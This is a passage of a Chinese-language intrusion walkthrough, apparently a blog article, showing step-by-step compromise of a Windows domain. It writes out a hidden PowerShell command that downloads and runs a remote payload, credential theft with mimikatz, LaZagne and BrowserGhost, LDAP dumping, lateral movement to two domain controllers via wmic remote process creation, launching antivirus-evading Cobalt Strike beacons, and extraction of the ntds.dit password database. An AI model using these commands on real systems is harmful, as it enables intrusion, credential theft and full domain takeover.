monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">cmd.exe /c powershell.exe -nop -w hidden -c &#34;IEX ((new-object net.webclient).downloadstring(&#39;<a href="http://xxxxxxxxxx" target="_blank">http://xxxxxxxxxx</a>&#39;))&#34;<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">cs可以上线</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">拿到administrator权限，</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001870" data-w="872" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.2029816513761468" src="https://wechat2rss.xlab.app/img-proxy/?k=5c9018e9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpRsICQyTY0XJG2rBJKsnzMvwEPHeM0kqQib0ot1JfA0eViaQicrIAcPanA%2F640%3Fwx_fmt%3Dpng"/></figure><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;">密码收集</h4><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1.执行mimikatz获取密码</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">logonpasswords<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001873" data-w="538" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.9460966542750929" src="https://wechat2rss.xlab.app/img-proxy/?k=42a8f137&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnp7iahpNEBkQ0j5w3MYmy3t3b2AicDHcJIibIvTf0ECtB86opic06FZ4IckA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2.使用LaZagne取各种连接工具密码、浏览器保存密码等</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell cmd.exe /c D:\bea\lazagne.exe all -oN<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001871" data-w="767" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.4784876140808344" src="https://wechat2rss.xlab.app/img-proxy/?k=973f4031&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpv23fr1fwdibNsPZNB74Vh8BYjlaDMPn2iaejmIt1IjorDpCcUyTQRRZA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">3.抓取浏览器密码，使用BrowserGhost</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001872" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.3111111111111111" src="https://wechat2rss.xlab.app/img-proxy/?k=227440ad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpyUZPan5nxUXZHa9Vic3Pj9faGp0T2wTkM6v2xOcrzIM5BB4SOGVl3Bg%2F640%3Fwx_fmt%3Dpng"/></figure><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;">dump LDAP</h4><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">查询到目标机器在域内，域用户登录</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell wmic computersystem get domain<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001875" data-w="468" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.28846153846153844" src="https://wechat2rss.xlab.app/img-proxy/?k=e6bcd349&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpbC6Ghtg6TsnpQUwiaibGtEcrss2rclXR32yqf7ibKhsQYMsp2uLqWOgCw%2F640%3Fwx_fmt%3Dpng"/></figure><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell whoami /all<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001877" data-w="556" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.45323741007194246" src="https://wechat2rss.xlab.app/img-proxy/?k=b9234b5c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnp4p4bsbSagRC7eGInZcjQiaftFVGFv2l7ZL64YyKOjcROLND7TxhKgLw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">前面已经确定目标机器在域内，并且目标机器是域用户登录。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">域成员用户可以通过LDAP访问域的目录数据库从而看到整个域的信息。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这是使用的一种方式是通过 ADExplorer软件dump</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">将ADExplorer.exe上传到目标机器，使用以下命令执行</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">D:\bea\xx\ADExplorer.exe -snapshot <span style="color: #98c379;line-height: 26px;">&#34;&#34;</span> D:\bea\xx\result.dat /accepteula<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001874" data-w="575" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.48" src="https://wechat2rss.xlab.app/img-proxy/?k=d5ab4b91&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnph32oCBIWbXUgnv65UL1A7nSaMiat33KyRLic55Pw3ibw3hJeRkmaXabYQ%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">将resul.dat 在本地用ADExplorer打开即可看到域的信息</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001878" data-w="1080" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.48518518518518516" src="https://wechat2rss.xlab.app/img-proxy/?k=7100fff6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnp8oQ1SOonHRdiamUiazZc8o00yhF1DQ9k9N3NALrXBycNTLvib2uhs4XYw%2F640%3Fwx_fmt%3Dpng"/></figure><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;">扫描内网</h4><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">查看本机IP，本机IP为192.168.10.3.</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">使用fscan工具扫描一下192.168.10内网段，从扫描结果看出192.168.10.10和192.168.10.32应该是域控服务器</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001876" data-w="666" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.25825825825825827" src="https://wechat2rss.xlab.app/img-proxy/?k=dddfb568&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnp8DabnUPA9TvQwLXHMR7cg53CUtUV2hiaV0hpu89icQ0NkSZEuew1QGXA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001883" data-w="706" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.7067988668555241" src="https://wechat2rss.xlab.app/img-proxy/?k=d813a0c7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpfdIbkzwZIz5ogqic6wFlicbicYPwYWFWLkCtpNvc0Gy6qKmQyUxOKTFwQ%2F640%3Fwx_fmt%3Dpng"/></figure><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;">横向</h4><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">通过LDAP和内网扫描看到域内有两台域控：192.168.10.10、192.168.10.32</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">判断用户权限</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell whoami /all<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001879" data-w="733" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.3451568894952251" src="https://wechat2rss.xlab.app/img-proxy/?k=f38e4e95&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpSszjaO8HhE7bBmTF1jMQrUwwdYCHoM0BbPFxV0a2ok1e75BIjg6qBg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001882" data-w="724" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.43232044198895025" src="https://wechat2rss.xlab.app/img-proxy/?k=11ecc7f3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpJCYo2YNHDwaS9eBnosZ88gh5p7kf7ulHUicg9cPOM954Dprc9BjpPpg%2F640%3Fwx_fmt%3Dpng"/></figure><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell net group <span style="color: #98c379;line-height: 26px;">&#34;domain admins&#34;</span> /domain<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001880" data-w="674" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5207715133531158" src="https://wechat2rss.xlab.app/img-proxy/?k=25484abd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpMTPMCC6PWprjTecqH8bSwcx0xHI8Em9B4ekA6xJtz8K5AoJJr9mRDA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">比较幸运，上线就是域管用户可以直接使用域管用户身份横线域内其他机器</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">先尝试横向域控192.168.10.10机器，wmic可用，通过wmic进行横向</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell wmic /node:192.168.10.10 os get name<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001881" data-w="657" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.2085235920852359" src="https://wechat2rss.xlab.app/img-proxy/?k=a58b6385&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpGAL0eR348mTMXFnw2WQmBUP4JibM7gITNyXIfxYeesPzib3ZqhXgppHg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">判断是否有杀软</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell wmic /node:192.168.10.10 process get processid,name<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001888" data-w="711" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5541490857946554" src="https://wechat2rss.xlab.app/img-proxy/?k=3d9613d8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpAlAzibm54AgldAstvYEu72Qhj5vOXFtwWicDBGYtgpfKu3R6Z9mmKVqg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001887" data-w="408" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.31862745098039214" src="https://wechat2rss.xlab.app/img-proxy/?k=7c1e1f9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpYlqraU4q924r2cVKtjaUBNfh2Ukiabz0xa5YO4GTicFDyF2XRgUkwoOw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">列出192.168.10.10进程，使用杀软在线查询，目标机器有杀软</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">判断192.168.10.10是否出网，如果直接执行ping 8.8.8.8或者其他公网地址，但是CS上没有回显就无法判断，在这里分享一下我常用的两种方法：</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">1.通过DNSlog （<a href="http://www.dnslog.cn/）" target="_blank">http://www.dnslog.cn/）</a></p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell wmic /node:192.168.10.10 process call create <span style="color: #98c379;line-height: 26px;">&#34;cmd.exe /c ping g2azxa.dnslog.cn&#34;</span><br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001884" data-w="725" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.44689655172413795" src="https://wechat2rss.xlab.app/img-proxy/?k=d3d87af3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnp1icFLM50eyFhb9rqXkEicDl7JMQQibIFXPZyqweGH7UBQf1jssv0xZyBA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">2.通过tcpdump</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">tcpdump -i 网卡名 icmp<br/>shell wmic /node:192.168.10.10 process call create <span style="color: #98c379;line-height: 26px;">&#34;cmd.exe /c ping VPSip&#34;</span><br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001886" data-w="661" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.10892586989409984" src="https://wechat2rss.xlab.app/img-proxy/?k=eefc8810&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpaUOovbW3N61phKV7kWz2BTkzTtuKX3GumA9FDaA0R3aicgttztB6q7A%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">两种方法都没有回显，192.168.10.10不出网。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">192.168.10.10不出网而且有杀软，先做免杀，然后通过CS的smb隧道将192.168.10.10link上线</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在CS上创建SMB监听，使用smb监听生成beacon。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">将做好免杀的beacon 上传到192.168.10.10。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001885" data-w="470" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="1.172340425531915" src="https://wechat2rss.xlab.app/img-proxy/?k=ae9e2eff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpcVxnCmUzvDQFgrOLUG0DyoicxB7apkbVJo88NicWjGKzfavk6nibN3ic2g%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001889" data-w="361" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.7146814404432132" src="https://wechat2rss.xlab.app/img-proxy/?k=c96c9b01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpfKCFcia1AoLLLUkB7WLOvFsCyaI9IFgOuDux7dUFmwcfPtGptVEAurg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001891" data-w="340" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.961764705882353" src="https://wechat2rss.xlab.app/img-proxy/?k=d2cf25e3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpLvnpdI51Yl8z33ZwRCeC89HqgQ4pACcN04ibwUvmL9iavPXGaCOx4Wicg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">通过link192.168.10.10 上线</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell wmic /node:192.168.10.10 process call create <span style="color: #98c379;line-height: 26px;">&#34;cmd.exe /c c:\Users\Public\ms.exe c:\Users\Public\mnb.bin.new&#34;</span><br/>link 192.168.10.10<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001890" data-w="658" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.1413373860182371" src="https://wechat2rss.xlab.app/img-proxy/?k=35310aeb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpn4pgFvE6UJz4ecictJOqOytYvV3J29ibU7iaSETlHScnRxu1rwGt7Jy1A%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001892" data-w="852" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.1960093896713615" src="https://wechat2rss.xlab.app/img-proxy/?k=fc82051e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnp0a3xt9fWFJwyUWia958jkTPYhUaSMM8WD4ibk6xe899Dc9A0DI42BmDg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">第一台域控上线，接着横向另一台192.168.10.32机器，方法跟上面一样，判断出网和杀软。</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001893" data-w="755" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.2" src="https://wechat2rss.xlab.app/img-proxy/?k=ca0fb928&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpic4axMLMvib29Ltg0Z9mhqV5ug0A9ar1IYe41NVTGK9UGG0SOPCRUwTA%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001894" data-w="408" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.31862745098039214" src="https://wechat2rss.xlab.app/img-proxy/?k=7c1e1f9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpYlqraU4q924r2cVKtjaUBNfh2Ukiabz0xa5YO4GTicFDyF2XRgUkwoOw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">192.168.10.32出网有杀软，这样就不用通过link上线了，直接做免杀beacon上线就行。</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell wmic /node:192.168.10.32 process call create <span style="color: #98c379;line-height: 26px;">&#34;cmd.exe /c c:\Users\Public\ms.exe c:\Users\Public\beacon.bin.new&#34;</span><br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001897" data-w="950" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.18947368421052632" src="https://wechat2rss.xlab.app/img-proxy/?k=0a151b6e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpVaoqbIqpAcKa6nATSicYGMVdNaGfsicL620M6TNRWdwvPB3f6iaysVguA%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">拿到域控可以导出域hash</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">Windows的密码是经过hash后存储的，本地存在hklm\sam，hklm\system注册表中</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">域里面存在域控制器的c:\windows\ntds\ntds.dit中，我们取出来解密即可</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, Monaco, Menlo, monospace;font-size: 12px;-webkit-overflow-scrolling: touch;padding-top: 15px;background: #282c34;border-radius: 5px;">shell ntdsutil <span style="color: #98c379;line-height: 26px;">&#34;activate instance ntds&#34;</span> ifm <span style="color: #98c379;line-height: 26px;">&#34;create full C:\users\Public\ntdsutil&#34;</span> quit quit<br/></code></pre><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-fileid="100001896" data-w="704" data-type="png" style="display: block;margin-right: auto;margin-left: auto;" data-ratio="0.5411931818181818" src="https://wechat2rss.xlab.app/img-proxy/?k=0fb1acb6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdG1JPYQ0ibsSd2GumOsslYnpfXRIgibXRwk2RhtJHFsC2cEQZcAIPbpB4mVrRwHQ13X8C1SZnHUW5Kg%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">再使用reg命令导出system 和security</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><code style="overflow-x: auto;padding: 16px;color: #abb2bf;display: -webkit-box;font-family: Operator Mono, Consolas, 